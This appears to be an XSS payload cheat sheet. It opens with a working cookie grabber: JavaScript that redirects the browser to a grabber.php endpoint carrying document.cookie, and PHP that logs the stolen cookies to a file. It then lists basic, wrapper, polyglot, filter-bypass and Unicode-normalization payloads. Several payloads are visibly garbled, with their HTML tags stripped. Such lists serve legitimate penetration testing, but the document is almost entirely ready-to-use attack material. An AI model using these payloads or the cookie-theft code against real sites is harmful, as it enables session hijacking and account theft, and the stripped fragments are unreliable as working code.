# Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. ## Exploit code or POC Cookie grabber for XSS ``` document.location='http://localhost/XSS/grabber.php?c=' + document.cookie // Write the cookie in a file $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie.'\r\n'); fclose($fp); ?> ``` ## XSS in HTML/Applications XSS Basic ``` Basic payload ipt>alert('XSS')ipt> "> "> Img payload xss "> "> Svg payload "> "> With an additionl URL ``` XSS in flash application ``` \%22})))}catch(e){alert(document.domain);}// "]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// "a")(({type:"ready"}));}catch(e){alert(1)}// ``` ## XSS in wrappers javascript and data XSS with javascript: ``` javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) ``` XSS with data: ``` data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ``` ## XSS in files XSS in XML ``` alert(1) ``` XSS in SVG ``` ``` XSS in SVG (short) ``` ``` more payloads in ./files ## Polyglot XSS Polyglot XSS - 0xsobky ``` jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e ``` Polyglot XSS - Ashar Javed ``` ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ``` Polyglot XSS - Mathias Karlsson ``` " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ``` Polyglot XSS - Rsnake ``` ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ``` ## Filter Bypass and exotic payloads ``` <script>$=1,alert($)</script> <script ~~~>confirm(1)</script ~~~> <script>$=1,\u0061lert($)</script> <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> <</script/script><script ~~~>\u0061lert(1)</script ~~~> </style></scRipt><scRipt>alert(1)</scRipt> <img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;> <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> <svg><x><script>alert&#40;&#39;1&#39;&#41</x> <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> ``` Using Unicode ``` Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %C0%BE = > %C0%BC = < %CA%BA = " %CA%B9 = ' %EF%BC%9E becomes > %EF%BC%9C becomes < ``` ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * tbm